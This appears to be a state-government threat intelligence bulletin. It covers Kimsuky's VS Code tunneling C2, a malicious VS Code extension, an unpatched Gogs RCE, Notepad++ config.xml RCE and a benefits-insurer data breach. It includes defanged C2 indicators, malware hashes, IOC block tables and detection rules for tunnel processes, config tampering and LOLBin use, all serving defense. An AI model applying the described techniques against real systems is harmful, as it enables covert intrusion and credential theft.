Supply Chain Threats Converge on State Government: VS Code, Git Repositories, and Third-Party Data Breaches Demand Immediate Action

<p> <strong> Threat Assessment Level: ELEVATED </strong> <em> (unchanged from prior cycle; trending toward HIGH) </em> </p> <p> State government IT leaders face a convergence of supply chain threats this week that demands immediate attention. On May 28, CISA issued an emergency alert on malicious Visual Studio Code extensions compromising GitHub repositories. On the same day, Rapid7 disclosed an unpatched critical zero-day in Gogs &mdash; a self-hosted Git service &mdash; with no vendor response and over 1,100 internet-facing instances exposed. Meanwhile, North Korea's Kimsuky group (APT43) has operationalized VS Code tunneling as a covert command-and-control channel and deployed malware likely developed with the assistance of large language models. And a confirmed breach at Beacon Mutual, a workers' compensation insurer, exposed current and former state employee PII &mdash; a textbook third-party supply chain failure. </p> <p> These are not theoretical risks. They target the exact tools and partnerships state agencies rely on daily. </p> <h2> <strong> What Changed This Week </strong> </h2> <table> <thead> <tr> <th> <p> <strong> Date </strong> </p> </th> <th> <p> <strong> Development </strong> </p> </th> <th> <p> <strong> Impact to State Government </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 29 May 2026 </p> </td> <td> <p> Kimsuky deploys HTTPSpy, HelloDoor (LLM-developed), and VS Code tunneling C2 </p> </td> <td> <p> Developer workstations with VS Code become C2 beacons invisible to network monitoring </p> </td> </tr> <tr> <td> <p> 29 May 2026 </p> </td> <td> <p> Notepad++ CVE-2026-48778/48770/48800 &mdash; RCE via config.xml manipulation </p> </td> <td> <p> <strong> Widely deployed on state admin/developer machines; low-complexity exploitation </strong> </p> </td> </tr> <tr> <td> <p> 28 May 2026 </p> </td> <td> <p> CISA Alert: Nx Console VS Code extension supply chain compromise </p> </td> <td> <p> Malicious extension targets CI/CD pipelines; state dev teams at risk </p> </td> </tr> <tr> <td> <p> 28 May 2026 </p> </td> <td> <p> Rapid7: Gogs zero-day RCE &mdash; unpatched, maintainers unresponsive </p> </td> <td> <p> Any state agency running Gogs has no remediation path except migration </p> </td> </tr> <tr> <td> <p> 28 May 2026 </p> </td> <td> <p> CISA ICS Advisories: ABB EIBPORT, Schneider EcoStruxure HVAC, XCharge C6 </p> </td> <td> <p> Building automation and HVAC systems in state facilities directly affected </p> </td> </tr> <tr> <td> <p> 28 May 2026 </p> </td> <td> <p> COZY BEAR (APT29) &mdash; refreshed active indicators </p> </td> <td> <p> Government entities remain primary targeting; updated IOCs require SOC action </p> </td> </tr> <tr> <td> <p> 27 May 2026 </p> </td> <td> <p> Beacon Mutual cyber-attack exposes state employee data </p> </td> <td> <p> Third-party benefits provider breach &mdash; PII of current/former state employees compromised </p> </td> </tr> <tr> <td> <p> 26 May 2026 </p> </td> <td> <p> FBI seizes "First VPN Service" infrastructure (prior cycle) </p> </td> <td> <p> ~25 ransomware groups disrupted; adversary migration to new infrastructure expected within 7&ndash;14 days </p> </td> </tr> </tbody> </table> <p> <strong> Continuity note: </strong> The threat level remains ELEVATED, unchanged from the prior cycle. The Abyss Locker kill chain (SonicWall CVE-2021-20038 exploitation), COZY BEAR (APT29) active indicators, and Iranian actors Nimbus Manticore and WARLORD KITTEN all remain active concerns from the May 28 assessment. No evidence justifies downgrading any of these threats. </p> <h2> <strong> Threat Timeline </strong> </h2> <table> <thead> <tr> <th> <p> <strong> Date </strong> </p> </th> <th> <p> <strong> Actor / Event </strong> </p> </th> <th> <p> <strong> Target </strong> </p> </th> <th> <p> <strong> TTP / Vector </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 27 May 2026 </p> </td> <td> <p> Unattributed </p> </td> <td> <p> State employees (via Beacon Mutual) </p> </td> <td> <p> Third-party data breach &mdash; PII exfiltration </p> </td> </tr> <tr> <td> <p> 28 May 2026 </p> </td> <td> <p> Unattributed </p> </td> <td> <p> Developer ecosystems </p> </td> <td> <p> Malicious VS Code extension (Nx Console) &rarr; CI/CD credential theft </p> </td> </tr> <tr> <td> <p> 28 May 2026 </p> </td> <td> <p> Unattributed </p> </td> <td> <p> Gogs users (1,100+ exposed) </p> </td> <td> <p> Argument injection &rarr; authenticated RCE via rebase merging </p> </td> </tr> <tr> <td> <p> 28 May 2026 </p> </td> <td> <p> Multiple ICS vendors </p> </td> <td> <p> Building automation, HVAC, EV charging </p> </td> <td> <p> Firmware vulnerabilities in ABB, Schneider, XCharge </p> </td> </tr> <tr> <td> <p> 28 May 2026 </p> </td> <td> <p> COZY BEAR (APT29) </p> </td> <td> <p> Government entities </p> </td> <td> <p> Refreshed indicators (prior cycle, still active) </p> </td> </tr> <tr> <td> <p> 29 May 2026 </p> </td> <td> <p> Kimsuky (APT43/DPRK) </p> </td> <td> <p> Government, defense, energy, healthcare </p> </td> <td> <p> HTTPSpy RAT, HelloDoor, VS Code tunneling C2 </p> </td> </tr> <tr> <td> <p> 29 May 2026 </p> </td> <td> <p> N/A (vulnerability) </p> </td> <td> <p> Notepad++ users </p> </td> <td> <p> Config.xml RCE (CVE-2026-48778) </p> </td> </tr> </tbody> </table> <h2> <strong> Key Threat Analysis </strong> </h2> <h3> <strong> 1. Kimsuky Evolves: VS Code Tunneling and AI-Developed Malware </strong> </h3> <p> North Korea's <strong> Kimsuky </strong> (also tracked as APT43) has significantly upgraded its operational tradecraft. Confirmed by both ENKI and Kaspersky, the group is now: </p> <ul> <li> <strong> Deploying HTTPSpy RAT </strong> via fake security software installers and spoofed Webex meeting pages </li> <li> <strong> Using VS Code Remote Tunneling </strong> as a persistent C2 channel &mdash; traffic routes through Microsoft's vscode.dev infrastructure, appearing as legitimate cloud communication </li> <li> <strong> Fielding HelloDoor </strong> &mdash; a Rust-based variant of PebbleDash that Kaspersky assesses was "likely developed using an LLM" </li> <li> <strong> Targeting government, energy, healthcare, and defense </strong> across multiple countries </li> </ul> <p> <strong> Why this matters for state government: </strong> VS Code is standard tooling on developer and admin workstations. Kimsuky's C2 traffic will appear as normal Microsoft cloud communication to network security tools. Traditional perimeter monitoring will not detect this. Host-based detection is required. </p> <p> <strong> Active IOCs confirmed (confidence 82&ndash;89): </strong> </p> <ul> <li> Domain: reward.freeddns[.]org </li> <li> IP: 118.194.248[.]246 (port 443) </li> <li> MD5: 7af2d954bdcf0bcf149fc91a856cd7c1 </li> <li> MD5: 1b1d8c182769b55a2eeeaf3364ac2f3e </li> <li> SHA-256: 3fc06b7da8cf9b90ca33601710fe81e90c95fc2c9aa3a906cf248121738e25b3 </li> </ul> <h3> <strong> 2. Supply Chain Attack Surface Expanding Across Three Vectors </strong> </h3> <p> Three distinct supply chain compromises emerged in a single 48-hour window: </p> <p> <strong> Vector 1 &mdash; Malicious VS Code Extension (Nx Console) </strong> </p> <p> CISA's alert identifies a compromised Visual Studio Code extension targeting CI/CD pipelines. Attackers gain access to GitHub repository tokens, pipeline secrets, and source code. Full IOCs pending from CISA. </p> <p> <strong> Vector 2 &mdash; Gogs Self-Hosted Git Zero-Day </strong> </p> <p> Rapid7 disclosed a critical argument injection vulnerability enabling authenticated RCE in Gogs. The exploit is automated, runs in seconds, and grants read access to all repositories on the instance. <strong> There is no patch. The maintainers have been unresponsive for two months. </strong> Any state agency running Gogs has a permanent vulnerability until the software is removed. </p> <p> <strong> Vector 3 &mdash; Third-Party Data Processor Breach (Beacon Mutual) </strong> </p> <p> A cyber-attack on Beacon Mutual, a Rhode Island workers' compensation insurer, exposed PII of current and former state employees. This is the supply chain risk that keeps CISOs awake &mdash; a vendor you may not even think of as a "technology partner" holding sensitive employee data. </p> <h3> <strong> 3. Notepad++ RCE &mdash; CVE-2026-48778 </strong> </h3> <p> Three vulnerabilities patched in Notepad++ 8.9.6.1. The most severe, <strong> CVE-2026-48778 </strong> , enables remote code execution through manipulation of config.xml. When a user selects "Open Containing Folder in cmd," the attacker's payload executes. Attack complexity is low. No privileges required. </p> <p> <strong> CVE-2026-48800 </strong> enables RCE via shortcuts.xml. <strong> CVE-2026-48770 </strong> causes denial of service. </p> <p> Notepad++ is ubiquitous on state developer and admin workstations. If config.xml files are synced via shared drives or cloud storage, this becomes a supply chain vector. </p> <h3> <strong> 4. ICS/Building Automation Vulnerabilities </strong> </h3> <p> CISA issued 10 ICS advisories on May 28. Most relevant to state facilities: </p> <ul> <li> <strong> ABB EIBPORT </strong> &mdash; building automation controller (firmware update available) </li> <li> <strong> Schneider Electric EcoStruxure Machine Expert HVAC </strong> &mdash; HVAC control system </li> <li> <strong> XCharge C6 </strong> &mdash; EV charging station (admin rights / code execution) </li> <li> <strong> USR-W610 </strong> &mdash; RS232/485 to Wi-Fi/Ethernet converter (admin access) </li> </ul> <p> State government buildings, data centers, and facilities likely run ABB and Schneider building automation. These systems are often managed by facilities teams with limited cybersecurity oversight. </p> <h3> <strong> 5. Persistent Nation-State Threats (Continuing from Prior Cycle) </strong> </h3> <table> <thead> <tr> <th> <p> <strong> Actor </strong> </p> </th> <th> <p> <strong> Origin </strong> </p> </th> <th> <p> <strong> Status </strong> </p> </th> <th> <p> <strong> Targeting </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> <strong> Kimsuky (APT43) </strong> </p> </td> <td> <p> DPRK </p> </td> <td> <p> Active &mdash; fresh IOCs, new TTPs </p> </td> <td> <p> Government, defense, energy, healthcare </p> </td> </tr> <tr> <td> <p> <strong> COZY BEAR (APT29) </strong> </p> </td> <td> <p> Russia (SVR) </p> </td> <td> <p> Active &mdash; refreshed indicators (28 May) </p> </td> <td> <p> Government entities </p> </td> </tr> <tr> <td> <p> <strong> Nimbus Manticore </strong> </p> </td> <td> <p> Iran (IRGC) </p> </td> <td> <p> Active </p> </td> <td> <p> Government &mdash; AI-assisted malware </p> </td> </tr> <tr> <td> <p> <strong> WARLORD KITTEN </strong> </p> </td> <td> <p> Iran </p> </td> <td> <p> Active (single-source attribution) </p> </td> <td> <p> Government, telecom </p> </td> </tr> <tr> <td> <p> <strong> Volt Typhoon </strong> </p> </td> <td> <p> China </p> </td> <td> <p> No collection &mdash; concerning absence </p> </td> <td> <p> <strong> U.S. critical infrastructure pre-positioning </strong> </p> </td> </tr> <tr> <td> <p> <strong> Salt Typhoon </strong> </p> </td> <td> <p> China </p> </td> <td> <p> No collection &mdash; concerning absence </p> </td> <td> <p> <strong> U.S. critical infrastructure </strong> </p> </td> </tr> </tbody> </table> <p> <strong> Critical absence: </strong> Zero intelligence collection on Volt Typhoon and Salt Typhoon despite documented pre-positioning in U.S. critical infrastructure. This is not reassurance &mdash; it may indicate collection gaps or stealthy pre-positioning below detection thresholds. </p> <h2> <strong> Predictive Analysis </strong> </h2> <table> <thead> <tr> <th> <p> <strong> Scenario </strong> </p> </th> <th> <p> <strong> Probability </strong> </p> </th> <th> <p> <strong> Timeframe </strong> </p> </th> <th> <p> <strong> Basis </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> CISA publishes full Nx Console IOCs enabling detection </p> </td> <td> <p> <strong> HIGH (85%) </strong> </p> </td> <td> <p> 48&ndash;72 hours </p> </td> <td> <p> Standard CISA disclosure cadence </p> </td> </tr> <tr> <td> <p> Gogs zero-day exploitation begins at scale </p> </td> <td> <p> <strong> HIGH (80%) </strong> </p> </td> <td> <p> 7 days </p> </td> <td> <p> Public PoC + 1,100 exposed instances + no patch </p> </td> </tr> <tr> <td> <p> Kimsuky expands VS Code tunneling to Western government targets </p> </td> <td> <p> <strong> MODERATE (55%) </strong> </p> </td> <td> <p> 30 days </p> </td> <td> <p> TTPs are transferable; government targeting confirmed </p> </td> </tr> <tr> <td> <p> Ransomware group claims state/local government victim </p> </td> <td> <p> <strong> MODERATE (50%) </strong> </p> </td> <td> <p> 7 days </p> </td> <td> <p> Rhysida/Qilin/Akira all active against gov sector; FBI VPN seizure forcing infrastructure migration </p> </td> </tr> <tr> <td> <p> Notepad++ CVE-2026-48778 exploited in the wild </p> </td> <td> <p> <strong> MODERATE (45%) </strong> </p> </td> <td> <p> 14 days </p> </td> <td> <p> <strong> PoC available, widely deployed, low complexity </strong> </p> </td> </tr> <tr> <td> <p> Volt Typhoon/Salt Typhoon activity surfaces in state networks </p> </td> <td> <p> <strong> LOW-MODERATE (30%) </strong> </p> </td> <td> <p> 30 days </p> </td> <td> <p> Documented pre-positioning but no current indicators </p> </td> </tr> </tbody> </table> <h2> <strong> SOC Operational Guidance </strong> </h2> <h3> <strong> Detection Priorities </strong> </h3> <ol> <li> <strong> VS Code Tunneling C2 Detection (Kimsuky &mdash; </strong> <strong> T1572 </strong> <strong> Protocol Tunneling) </strong> </li> </ol> <ul> <li> <strong> Hunt hypothesis: </strong> Adversary establishes persistent C2 via VS Code Remote Tunneling on compromised workstations. Traffic appears as legitimate HTTPS to Microsoft infrastructure. </li> <li> <strong> Detection: </strong> Alert on code.exe or code-tunnel processes establishing persistent outbound connections on machines where VS Code is NOT in the approved software baseline, or on non-developer endpoints. </li> <li> <strong> Network indicators: </strong> Sustained connections to *.vscode.dev or tunnel.vscode.dev from unexpected hosts. </li> <li> <strong> ATT&amp;CK: </strong> T1572 (Protocol Tunneling), T1071.001 (Web Protocols), T1102 (Web Service) </li> </ul> <ol start="2"> <li> <strong> Malicious VS Code Extension Detection ( </strong> <strong> T1195.002 </strong> <strong> Supply Chain Compromise) </strong> </li> </ol> <ul> <li> <strong> Hunt hypothesis: </strong> Compromised Nx Console extension exfiltrates CI/CD tokens and pipeline secrets. </li> <li> <strong> Detection: </strong> Audit installed VS Code extensions across all developer workstations. Compare against known-good extension list. Alert on extensions with recent unexpected updates or unknown publishers. </li> <li> <strong> ATT&amp;CK: </strong> T1195.002 (Supply Chain Compromise), T1552.001 (Credentials in Files), T1098 (Account Manipulation) </li> </ul> <ol start="3"> <li> <strong> Notepad++ Config Manipulation (CVE-2026-48778 &mdash; </strong> <strong> T1059.003 </strong> <strong> Windows Command Shell) </strong> </li> </ol> <ul> <li> <strong> Hunt hypothesis: </strong> Attacker modifies config.xml to inject malicious commandLineInterpreter value. </li> <li> <strong> Detection: </strong> File integrity monitoring on %APPDATA%\Notepad++\config.xml and shortcuts.xml. Alert on modification of commandLineInterpreter parameter to any value other than cmd.exe. </li> <li> <strong> ATT&amp;CK: </strong> T1059.003 (Windows Command Shell), T1574.001 (Executable Path Interception) </li> </ul> <ol start="4"> <li> <strong> Gogs Exploitation ( </strong> <strong> T1190 </strong> <strong> Exploit Public-Facing Application) </strong> </li> </ol> <ul> <li> <strong> Hunt hypothesis: </strong> Authenticated attacker exploits rebase merge argument injection for RCE. </li> <li> <strong> Detection: </strong> If Gogs is deployed, monitor for unusual process spawning from the Gogs service account. Alert on any git rebase operations followed by unexpected child processes. </li> <li> <strong> ATT&amp;CK: </strong> T1190 (Exploit Public-Facing Application), T1059 (Command and Scripting Interpreter) </li> </ul> <ol start="5"> <li> <strong> Kimsuky IOC Blocking </strong> </li> </ol> <ul> <li> Block at network perimeter and DNS: reward.freeddns[.]org, 118.194.248[.]246:443 </li> <li> Deploy hash-based detections: 7af2d954bdcf0bcf149fc91a856cd7c1, 1b1d8c182769b55a2eeeaf3364ac2f3e </li> <li> <strong> ATT&amp;CK: </strong> T1566.001 (Spearphishing), T1204.002 (User Execution: Malicious File) </li> </ul> <ol start="6"> <li> <strong> Ransomware Precursor Hunting (PIR-001 &mdash; Quiet but Active) </strong> </li> </ol> <ul> <li> <strong> Hunt hypothesis: </strong> Rhysida/Qilin/Akira operators are conducting reconnaissance or pre-positioning in state networks without triggering alerts. </li> <li> <strong> Detection: </strong> Hunt for T1078 (Valid Accounts) anomalies &mdash; service accounts authenticating from unusual locations. Hunt for T1021.001 (Remote Desktop Protocol) lateral movement during off-hours. Monitor for Veeam credential access (T1003) per Abyss Locker kill chain from prior cycle. </li> <li> <strong> ATT&amp;CK: </strong> T1078, T1021.001, T1003, T1486 (Data Encrypted for Impact) </li> </ul> <h3> <strong> IOC Blocking Table </strong> </h3> <table> <thead> <tr> <th> <p> <strong> Type </strong> </p> </th> <th> <p> <strong> Value </strong> </p> </th> <th> <p> <strong> Context </strong> </p> </th> <th> <p> <strong> Action </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> Domain </p> </td> <td> <p> reward.freeddns[.]org </p> </td> <td> <p> Kimsuky C2 (confidence 89) </p> </td> <td> <p> Block DNS + proxy </p> </td> </tr> <tr> <td> <p> IPv4 </p> </td> <td> <p> 118.194.248[.]246 </p> </td> <td> <p> Kimsuky C2, port 443 (confidence 82) </p> </td> <td> <p> Block at firewall </p> </td> </tr> <tr> <td> <p> MD5 </p> </td> <td> <p> 7af2d954bdcf0bcf149fc91a856cd7c1 </p> </td> <td> <p> Kimsuky malware (confidence 85) </p> </td> <td> <p> Block at EDR </p> </td> </tr> <tr> <td> <p> MD5 </p> </td> <td> <p> 1b1d8c182769b55a2eeeaf3364ac2f3e </p> </td> <td> <p> Kimsuky malware (confidence 85) </p> </td> <td> <p> Block at EDR </p> </td> </tr> <tr> <td> <p> SHA-256 </p> </td> <td> <p> 3fc06b7da8cf9b90ca33601710fe81e90c95fc2c9aa3a906cf248121738e25b3 </p> </td> <td> <p> Kimsuky malware (confidence 85) </p> </td> <td> <p> Block at EDR </p> </td> </tr> </tbody> </table> <p> Additional IOCs for campaigns discussed in this report are available through Anomali ThreatStream Next-Gen and partner feeds. </p> <h2> <strong> Sector-Specific Defensive Priorities </strong> </h2> <h3> <strong> Financial Services (State Treasury, Revenue, Benefits Systems) </strong> </h3> <ul> <li> <strong> Primary threat: </strong> Third-party data processor breaches (Beacon Mutual model). Benefits administrators, payroll processors, and tax filing partners hold state employee and citizen PII. </li> <li> <strong> Action: </strong> Inventory all third-party processors with access to financial PII. Verify breach notification clauses in contracts. Require SOC 2 Type II or equivalent from all processors handling &gt;10,000 records. </li> <li> <strong> Secondary threat: </strong> Kimsuky targeting financial sector with HTTPSpy. Monitor for spoofed meeting invitations (Webex, Teams) targeting finance staff. </li> </ul> <h3> <strong> Energy (State-Managed Utilities, Grid Coordination) </strong> </h3> <ul> <li> <strong> Primary threat: </strong> ICS/SCADA vulnerabilities (ABB EIBPORT, Schneider EcoStruxure). Volt Typhoon pre-positioning in energy infrastructure (absence is not assurance). </li> <li> <strong> Action: </strong> Segment OT networks from IT. Apply CISA ICS advisory patches (ICSA-26-148 series). Conduct proactive hunt for living-off-the-land binaries (LOLBins) in OT-adjacent networks &mdash; Volt Typhoon's signature approach. </li> <li> <strong> Secondary threat: </strong> XCharge C6 EV charging station vulnerabilities &mdash; relevant if state manages EV charging infrastructure. </li> </ul> <h3> <strong> Healthcare (State Health Agencies, Medicaid Systems) </strong> </h3> <ul> <li> <strong> Primary threat: </strong> Kimsuky explicitly targeting healthcare sector. HTTPSpy and HelloDoor deployments confirmed against health organizations. </li> <li> <strong> Action: </strong> Deploy Kimsuky IOCs to all healthcare network segments. Brief clinical IT staff on spoofed security software installers. Monitor for VS Code tunneling from clinical workstations (should never occur). </li> <li> <strong> Secondary threat: </strong> Ransomware groups (Rhysida, Qilin) historically target healthcare for maximum pressure. </li> </ul> <h3> <strong> Government (Executive Agencies, Legislative Systems, Courts) </strong> </h3> <ul> <li> <strong> Primary threat: </strong> Nation-state espionage &mdash; COZY BEAR (Russia), Kimsuky (DPRK), Nimbus Manticore (Iran) all actively targeting government. Supply chain compromise via developer tooling (VS Code, Git). </li> <li> <strong> Action: </strong> Audit all VS Code installations and extensions. Block Kimsuky IOCs. Review OAuth/device code flow configurations in M365 to prevent MFA bypass (COZY BEAR TTP from prior cycle). Verify SonicWall patch status for CVE-2021-20038 (Abyss Locker vector). </li> <li> <strong> Secondary threat: </strong> Beacon Mutual-style breaches via any third-party holding government employee data. </li> </ul> <h3> <strong> Aviation / Logistics (State DOT, Airport Authorities, Port Systems) </strong> </h3> <ul> <li> <strong> Primary threat: </strong> ICS vulnerabilities in transportation control systems. MacGregor VDR (Voyage Data Recorder) advisory in CISA batch &mdash; relevant to port authorities. </li> <li> <strong> Action: </strong> Inventory all ICS/SCADA systems in transportation infrastructure. Apply CISA advisories. Segment operational technology from administrative networks. </li> <li> <strong> Secondary threat: </strong> Supply chain compromise of logistics software via CI/CD pipeline attacks (Nx Console model). </li> </ul> <h2> <strong> Prioritized Defense Recommendations </strong> </h2> <h3> <strong> IMMEDIATE (Within 24 Hours) </strong> </h3> <table> <thead> <tr> <th> <p> <strong> Priority </strong> </p> </th> <th> <p> <strong> Owner </strong> </p> </th> <th> <p> <strong> Action </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 1 </p> </td> <td> <p> IT Ops </p> </td> <td> <p> <strong> Patch Notepad++ to version 8.9.6.1 on all state developer and admin workstations. CVE-2026-48778 enables RCE via config.xml with low attack complexity and no privileges required. </strong> </p> </td> </tr> <tr> <td> <p> 2 </p> </td> <td> <p> DevOps </p> </td> <td> <p> <strong> Audit all VS Code extensions </strong> across state developer environments for malicious Nx Console variants. Remove any unrecognized or recently-modified extensions. Cross-reference CISA alert when full IOCs publish. </p> </td> </tr> <tr> <td> <p> 3 </p> </td> <td> <p> DevOps </p> </td> <td> <p> <strong> Inventory all Gogs instances </strong> across state agencies. If found: disable rebase merging immediately, restrict to internal-only access, and begin migration planning to a maintained alternative (Gitea, GitLab). There is no patch. </p> </td> </tr> <tr> <td> <p> 4 </p> </td> <td> <p> SOC </p> </td> <td> <p> <strong> Block Kimsuky IOCs </strong> at network perimeter: reward.freeddns[.]org, 118.194.248[.]246:443. Deploy hash-based detections to EDR. </p> </td> </tr> <tr> <td> <p> 5 </p> </td> <td> <p> SOC </p> </td> <td> <p> <strong> Verify SonicWall firewalls </strong> are patched against CVE-2021-20038 (Abyss Locker exploitation vector from prior cycle). </p> </td> </tr> </tbody> </table> <h3> <strong> 7-DAY </strong> </h3> <table> <thead> <tr> <th> <p> <strong> Priority </strong> </p> </th> <th> <p> <strong> Owner </strong> </p> </th> <th> <p> <strong> Action </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 6 </p> </td> <td> <p> SOC </p> </td> <td> <p> <strong> Deploy VS Code tunneling detection rule. </strong> Alert on code.exe / code-tunnel processes with persistent outbound connections to *.vscode.dev from non-developer endpoints or machines without VS Code in approved baseline. </p> </td> </tr> <tr> <td> <p> 7 </p> </td> <td> <p> IT Ops / Facilities </p> </td> <td> <p> <strong> Apply firmware updates </strong> to ABB EIBPORT building automation controllers and Schneider EcoStruxure Machine Expert HVAC systems per ICSA-26-148-03 and ICSA-26-148-07. </p> </td> </tr> <tr> <td> <p> 8 </p> </td> <td> <p> SOC </p> </td> <td> <p> <strong> Conduct proactive ransomware precursor hunt. </strong> Search for Rhysida/Qilin/Akira indicators: anomalous service account authentication, off-hours RDP lateral movement, Veeam credential access attempts. </p> </td> </tr> <tr> <td> <p> 9 </p> </td> <td> <p> IAM Team </p> </td> <td> <p> <strong> Review M365 OAuth device code flow </strong> configurations. Restrict to managed devices only to prevent MFA-bypass phishing (COZY BEAR TTP). </p> </td> </tr> <tr> <td> <p> 10 </p> </td> <td> <p> SOC </p> </td> <td> <p> <strong> Develop behavioral detection </strong> for config.xml and shortcuts.xml modification on Notepad++ endpoints &mdash; covers future config-based RCE variants. </p> </td> </tr> </tbody> </table> <h3> <strong> 30-DAY </strong> </h3> <table> <thead> <tr> <th> <p> <strong> Priority </strong> </p> </th> <th> <p> <strong> Owner </strong> </p> </th> <th> <p> <strong> Action </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 11 </p> </td> <td> <p> CISO </p> </td> <td> <p> <strong> Commission third-party risk assessment </strong> of all benefits providers, workers' comp insurers, pension administrators, and payroll processors holding state employee PII. The Beacon Mutual breach is a template for future incidents. </p> </td> </tr> <tr> <td> <p> 12 </p> </td> <td> <p> CISO / CIO </p> </td> <td> <p> <strong> Establish software bill of materials (SBOM) program </strong> covering developer tooling &mdash; not just production dependencies. VS Code extensions, Git services, and CI/CD plugins are now confirmed attack surfaces. </p> </td> </tr> <tr> <td> <p> 13 </p> </td> <td> <p> CISO </p> </td> <td> <p> <strong> Initiate proactive threat hunt </strong> for Volt Typhoon / Salt Typhoon pre-positioning TTPs: living-off-the-land binaries, unusual use of built-in Windows tools (certutil, netsh, wmic), and anomalous network reconnaissance from internal hosts. </p> </td> </tr> <tr> <td> <p> 14 </p> </td> <td> <p> IR Team </p> </td> <td> <p> <strong> Update incident response playbooks </strong> to include supply chain compromise scenarios: malicious VS Code extension, compromised Git repository, and third-party data processor breach. Tabletop exercise recommended. </p> </td> </tr> <tr> <td> <p> 15 </p> </td> <td> <p> CIO </p> </td> <td> <p> <strong> Escalate OSINT collection gap. </strong> The state's threat intelligence capability has operated with degraded open-source collection for 103 consecutive days. This creates a structural blind spot. Procurement of replacement OSINT feeds should be treated as a P0 priority. </p> </td> </tr> </tbody> </table> <h2> <strong> Executive Decisions Required </strong> </h2> <ol> <li> <strong> Approve emergency Notepad++ patching </strong> &mdash; CVE-2026-48778 is low-complexity RCE on a tool deployed across state workstations </li> <li> <strong> Direct Gogs inventory and migration </strong> &mdash; zero-day with no patch path; any instance is permanently vulnerable </li> <li> <strong> Initiate third-party risk review </strong> &mdash; Beacon Mutual breach proves benefits providers are an unmonitored attack surface for state employee data </li> <li> <strong> Fund OSINT collection replacement </strong> &mdash; 103 days of degraded open-source intelligence is an unacceptable structural gap </li> </ol> <h2> <strong> Bottom Line </strong> </h2> <p> Three supply chain vectors converged in a single 48-hour window. Kimsuky is running nation-state C2 through a tool your developers use every day. A Git service with no patch and no vendor response sits exposed across more than 1,100 internet-facing instances. A benefits insurer you may never have classified as a technology risk has already handed adversaries your employees' PII. None of these threats require a sophisticated attacker to exploit &mdash; they require only that defenders delay action. </p> <p> The 24-hour recommendations in this report require no budget approval and no architectural changes. Patch Notepad++. Audit VS Code extensions. Find and isolate every Gogs instance. Block the Kimsuky IOCs. These actions close the most immediate exposure windows before adversaries move from reconnaissance to exploitation. </p> <p> The 30-day recommendations address the structural conditions that made this week's convergence possible: an unmeasured third-party risk surface, no SBOM discipline for developer tooling, and a degraded OSINT collection capability that has persisted for over three months. Fixing those conditions is what prevents the next convergence. </p> <h2> <strong> Closing </strong> </h2> <p> The convergence of three supply chain vectors in 48 hours &mdash; malicious IDE extensions, unpatched source code management, and third-party data processor breaches &mdash; signals a fundamental shift in how state government attack surfaces are defined. Your perimeter is no longer your network boundary. It extends to every developer's VS Code installation, every self-hosted Git instance buried in an agency's infrastructure, and every insurance company that holds your employees' Social Security numbers. </p> <p> Kimsuky's adoption of VS Code tunneling means that a legitimate Microsoft tool, generating legitimate-looking Microsoft traffic, is now a confirmed nation-state C2 channel. Traditional network monitoring will not catch this. The Gogs zero-day means that "self-hosted for security" may now mean "permanently vulnerable with no remediation." And the Beacon Mutual breach means your third-party risk program needs to extend far beyond technology vendors. </p> <p> The actions outlined above are specific, prioritized, and time-bound. The 24-hour items &mdash; patching Notepad++, auditing VS Code extensions, inventorying Gogs, and blocking Kimsuky IOCs &mdash; require no budget approval and no architectural changes. They require only the decision to act today rather than tomorrow. </p> <p> Tomorrow's threat landscape will not wait for next quarter's planning cycle. </p> <p> <em> Anomali CTI Desk | 29 May 2026 | TLP:GREEN </em> </p> <p> <em> This intelligence is assessed as shareable within the state government community and peer organizations. </em> </p>